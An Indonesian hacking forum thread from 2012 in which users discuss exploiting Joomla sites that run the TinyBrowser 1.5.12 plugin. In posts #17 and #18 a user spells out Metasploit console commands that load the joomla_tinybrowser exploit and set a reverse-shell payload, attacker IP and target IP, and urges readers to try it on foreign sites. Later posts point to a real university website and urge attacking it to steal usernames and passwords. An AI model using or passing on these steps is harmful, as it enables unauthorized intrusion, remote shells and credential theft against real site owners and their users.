ASK TENTANG JOOMSCAN.PL
#11
Dilanjutkan saja diskusi ini Smile
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#12
(03-03-2012, 07:53 AM)THJC Wrote: Dilanjutkan saja diskusi ini Smile

ya ampunnn dilanjutkan??? tp gak da yg mau help help ni Angry
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#13
http://www.exploit-db.com/exploits/16906/
tHerE's sOmeTHinG ouT tHeRe

#14
(03-25-2012, 02:24 PM)tredz Wrote: http://www.exploit-db.com/exploits/16906/

wew exploit apa ni Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#15
(03-25-2012, 05:49 PM)ekawithoutyou Wrote:
(03-25-2012, 02:24 PM)tredz Wrote: http://www.exploit-db.com/exploits/16906/

wew exploit apa ni Tongue

itu udh ada di metasploit kok, exploit buat upload file klo Joomla pake plugin TinyBrowser 1.5.12

di scan aja dulu, klo webnya pake plugin diatas tinggal setup metasploit dan siapkan file yg mau diupload (shell)

#16
jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..
<< back|track'ers newbee

#17
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue

#18
(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue
ini nih yg saya cari makasi banyak om konspirasi
<< back|track'ers newbee

#19
hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

#20
(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix






Users browsing this thread: 1 Guest(s)